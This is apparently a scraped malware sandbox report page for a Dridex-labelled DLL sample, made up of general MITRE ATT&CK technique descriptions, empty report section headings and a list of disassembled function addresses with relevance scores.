Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Pv3ZsGsdfS.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Dridex

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

Function 6EC70730, Relevance: 5.2, APIs: 3, Instructions: 650
COMMONCrypto

Function 6EC72234, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Function 6EC72820, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Function 6EC73138, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 6EC710A4, Relevance: 3.2, APIs: 2, Instructions: 153
COMMON

Function 6EC757B4, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Function 6EC75B3C, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Function 6EC71166, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Function 6EC75BE5, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Function 6EC75BBD, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Function 6EC75BD1, Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Function 6EC75BB3, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Function 6EC75C01, Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Function 6EC75E10, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Function 6EC75E84, Relevance: 1.5, APIs: 1, Instructions: 45
fileCOMMON

Function 6EC7564C, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Function 6EC71030, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Function 6EC73628, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Function 6EC61494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Function 6EC6A4E8, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Function 6EC68428, Relevance: 1.8, Strings: 1, Instructions: 531
COMMONCrypto

Function 6EC79370, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Function 6EC7143C, Relevance: .6, Instructions: 572
COMMONCrypto

Function 6EC66D0C, Relevance: .0, Instructions: 36
COMMON

Function 0078141B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 173
memoryCOMMON